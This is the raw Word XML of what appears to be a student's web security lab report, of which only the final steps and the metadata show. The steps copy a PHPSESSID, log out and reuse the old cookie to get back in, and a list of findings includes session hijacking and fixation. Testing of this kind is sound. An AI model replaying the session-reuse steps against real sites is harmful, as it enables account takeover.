        <w:br/>
        <w:t>-----------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 13: Copy Session ID</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Login → Copy PHPSESSID</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 14: Logout</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Click Logout</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 15: Reuse Old Session</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Open Private Window</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Paste old PHPSESSID in cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Open internal page (index.php)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Logged in again → Logout failed to destroy session</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>=========================================</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>RESULT</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>=========================================</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>• Weak password allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>• No account lockout</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>• Session ID exposed</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>• Session hijacking possible</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>• Session fixation observed</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>• Logout not destroying session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEDA91F" w14:textId="1B91FC4D" w:rsidR="00F049F3" w:rsidRPr="00713F6E" w:rsidRDefault="00F049F3" w:rsidP="00713F6E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F049F3" w:rsidRPr="00713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25E61580"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="301025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136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3B9"/>
    <w:rsid w:val="00066266"/>
    <w:rsid w:val="000B64B0"/>
    <w:rsid w:val="002403B9"/>
    <w:rsid w:val="002C5E1E"/>
    <w:rsid w:val="00402DCF"/>
    <w:rsid w:val="00404498"/>
    <w:rsid w:val="00423D73"/>
    <w:rsid w:val="004F4B26"/>
    <w:rsid w:val="00507497"/>
    <w:rsid w:val="00700C2F"/>
    <w:rsid w:val="00713F6E"/>
    <w:rsid w:val="00781094"/>
    <w:rsid w:val="00805008"/>
    <w:rsid w:val="00826CB2"/>
    <w:rsid w:val="00837270"/>
    <w:rsid w:val="00A92658"/>
    <w:rsid w:val="00AB5DE4"/>
    <w:rsid w:val="00AE4FCB"/>
    <w:rsid w:val="00AF0D58"/>
    <w:rsid w:val="00AF6694"/>
    <w:rsid w:val="00BC6B4B"/>
    <w:rsid w:val="00BE253B"/>
    <w:rsid w:val="00BF38EA"/>
    <w:rsid w:val="00C2479E"/>
    <w:rsid w:val="00C40170"/>
    <w:rsid w:val="00D076F4"/>
    <w:rsid w:val="00D87CD5"/>
    <w:rsid w:val="00DB5F7B"/>
    <w:rsid w:val="00DC1B5E"/>
    <w:rsid w:val="00DE339E"/>
    <w:rsid w:val="00EF262A"/>
    <w:rsid w:val="00F0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568DB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{460C54E7-E430-41AD-AFBE-4B7539102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3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3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3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3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3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3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3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3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8</Pages>
  <Words>1313</Words>
  <Characters>7488</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>62</Lines>
  <Paragraphs>17</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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karunya bamani</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>karunya bamani</cp:lastModifiedBy>
  <cp:revision>29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-26T16:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-26T18:29:00Z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519b8da6-926a-478a-be01-a1e401da1ab1</vt:lpwstr>
  </property>
</Properties>
</file>